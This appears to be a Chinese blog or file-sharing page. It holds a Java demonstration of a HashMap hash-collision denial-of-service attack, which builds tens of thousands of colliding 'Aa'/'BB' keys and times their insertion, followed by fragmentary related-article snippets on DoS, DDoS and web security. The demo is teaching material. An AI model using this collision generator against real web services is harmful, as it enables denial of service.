import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* 用来模拟HashMap的拒绝服务攻击,因为hash表存放数据的时候如果HashCode值相等,
* 首先用hash值确定tables的索引【index】,得到entry,然后将自己加入entry链的头部
* 原来的值就成为它的next,这也是为什么entry有Next
* 则这个相同的HashCode上用链表的形式去存放HashCode相等的值,如果相似的Code
* 太多,这个链表将很长,一个简单的查询将耗尽所有的CPU
* @author wb-zhangye
*
*/
public class HashDenyService {
/**
* 存放要放入hash表中hashcode相同的字符串
*/
private static List<String> DEPOSITORY = new ArrayList<String>();
/**
* HashMap存放多个hashCode相同的键
*/
private static Map<String, String> DENYMAP = new HashMap<String, String>();
/**
* 要放入hash表中的相同hashCode的个数,用 2 的POWER次幂表示,
* 例如 2^15
*/
private static int POWER = 15;
public static void main(String[] args) {
/**************************************************
***************构造多个hashCode相同的Map***********
**************************************************/
System.out.println("-------------attack---------- ");
Long beginTime = System.currentTimeMillis();
String xx = "Aa", yy = "BB"; // xx 与 yy的hashCode值相同
String[] arrays = { xx, yy };
perm(arrays, null);
for(int i = 0; i < DEPOSITORY.size(); i++){
DENYMAP.put(DEPOSITORY.get(i), "xx" + i);
}
Long endTime = System.currentTimeMillis();
System.out.println("-------------cease fire---------- ");
System.out.println("一共耗时" + (endTime - beginTime));
/**************************************************
*************在Map中取出一个key对应的value*********
**************************************************/
System.out.println("-------------start get Service---------- ");
Long xstartTiem = System.currentTimeMillis();
String tempData = DENYMAP.get(DEPOSITORY.get(30));
int code = hash(tempData.hashCode());
int index = code & (64 - 1);
System.out.println("index is " + index);
System.out.println(DENYMAP.get(DEPOSITORY.get(30)));
Long xendTime = System.currentTimeMillis();
System.out.println("一共耗时" + (xendTime - xstartTiem));
System.out.println("-------------end end Service---------- ");
}
public static int hash(int h) {
h ^= (h >>> 20) ^ (h >>> 12);
return h ^ (h >>> 7) ^ (h >>> 4);
}
/**
* 构造多个hashcode相同的字符串,放入DEPOSITORY中
* @param arrays
* @param paramList
*/
public static void perm(String[] arrays, List<String> paramList) {
int length = arrays.length;
for (int i = 0; i < length; i++) {
List<String> tempArray = null;
if (null == paramList) {
tempArray = new ArrayList<String>();
} else {
tempArray = paramList;
}
if (tempArray.size() <= POWER) {
List<String> tempList = new ArrayList<String>(tempArray);
tempList.add(arrays[i]);
perm(arrays, tempList);
} else {
DEPOSITORY.add(transferStr(tempArray));
return;
}
}
}
private static String transferStr(List list){
int length = list.size();
StringBuilder builder = new StringBuilder();
for(int i = 0; i < length; i++){
builder.append(list.get(i));
}
return builder.toString();
}
}
Output
-------------attack----------
-------------cease fire----------
一共耗时99433
-------------start get Service----------
index is 27
xx30
一共耗时0
-------------end end Service----------
分享到:
相关推荐
标题中的“Hash Collision DoS漏洞:web实例”指的是在Web应用程序中出现的一种安全问题,即哈希碰撞拒绝服务攻击(Hash Collision Denial of Service)。这种攻击利用了哈希表(Hash Table)数据结构的特性,当两个...
在这个情况下,攻击者可能会利用这个漏洞进行拒绝服务(DoS)攻击,或者在某些情况下,可能能够执行任意代码,从而获取对系统的控制权。 **补丁的类型与应用** PHP 5.2.17的补丁分为两类,分别对应不同的编译选项:...
其次,网站可用性及平稳度监测主要针对拒绝服务攻击和域名劫持等问题,通过远程监测技术和网络响应速度分析,及时发现潜在的拒绝服务攻击,同时监控域名安全,确保DNS解析的正常运行。 接着,网站挂马监测是针对...
(A) A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 2. (单选题)为了防御网络监听,最常用的方法是:(B) A、采用物理传输(非网络) B、信息加密 C、无线网 D、使用专线传输 3.(单选题)一个数据包过滤...
1.1.2.2 可用性及稳定性监测主要关注拒绝服务攻击和域名劫持,通过PING、HTTP响应速度等方法检测可能的拒绝服务攻击,同时监控DNS解析速度以确保域名安全。 1.1.2.3 挂马监测功能旨在发现被嵌入恶意代码的网页,...
渗透测试能够获取的有效信息包括信息泄露、业务逻辑测试、认证测试、会话管理测试、数据有效性验证测试、拒绝服务测试、应用安全测试、入侵通路测试等。 攻防演练是指一系列的测试和评估,以确保计算机系统或网络的...
`Client ReDoS From Regex Injection`, `Unchecked Input for Loop Condition`, `Use of a One Way Hash with a Predictable Salt`等,这些都是可能导致隐私泄露、拒绝服务攻击、不安全的数据处理等问题的漏洞。...
分布式拒绝服务攻击(DDoS)是一种常见的网络攻击方式,它利用大量被控制的设备同时向目标发送请求,从而导致目标服务器的资源被耗尽,无法为合法用户提供服务。DDoS攻击的防御和解决方案是网络安全性的重要组成部分...
│ 任务134:拒绝服务工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye.mp4 │ ├─第17章 免杀 │ 任务135:恶意软件、防软件、免杀技术、当前现状.mp4 ...
23. **分布式拒绝服务攻击(DDoS)**:通过大量傀儡机发送合法但无用的数据包,消耗目标主机资源。预防措施包括:更新系统补丁、禁止IP欺骗、协同防御、建立多层次安全体系。 这些知识点涵盖了网络安全的基本原理、...
此漏洞主要影响MySQL 5.5、5.6和5.7版本,可能导致远程代码执行(RCE)或者拒绝服务(DoS)攻击,对企业的数据安全构成严重威胁。本文将深入探讨该漏洞的成因、影响范围以及如何进行防护。 ### 漏洞成因 CVE-2018-...
否则拒绝访问。 ### 密码重置机制 为了方便用户在忘记密码时能够找回账户,通常会设计密码重置功能。常见的做法是在用户请求重置密码时,向其注册邮箱发送一封包含重置链接的邮件。用户点击链接后,系统会引导其...
2. 攻击目标:WanaCry 勒索软件主要针对Windows系统,因为它利用了Windows操作系统中的SMB(Server Message Block)服务漏洞进行攻击。 3. 恶意代码特征:恶意代码通常具有以下共同特征: - 恶意目的:设计用于...
被动攻击,如监听和数据窃取,通常是难以检测的,而主动攻击,如拒绝服务攻击和中间人攻击,可以通过防火墙和入侵检测系统来预防。 2. 数据完整性机制可以防止数据在传输过程中被篡改或破坏,但无法防止源地址欺骗...
如果不匹配,Apple将拒绝该操作,以防止非法固件的安装。 以下是一些关于iPhone 4 SHSH的重要知识点: 1. **备份SHSH**:用户可以通过第三方工具如TinyUmbrella或Redsn0w备份他们的SHSH。这是为了在Apple停止签署...
由于RFID系统中的标签与阅读器之间的通信主要依赖于无线信道,这为攻击者提供了多种非法攻击的机会,比如窃听、重放攻击、假冒、篡改数据以及拒绝服务攻击(DoS)。这些攻击不仅能够泄露标签信息,还可能对带有RFID...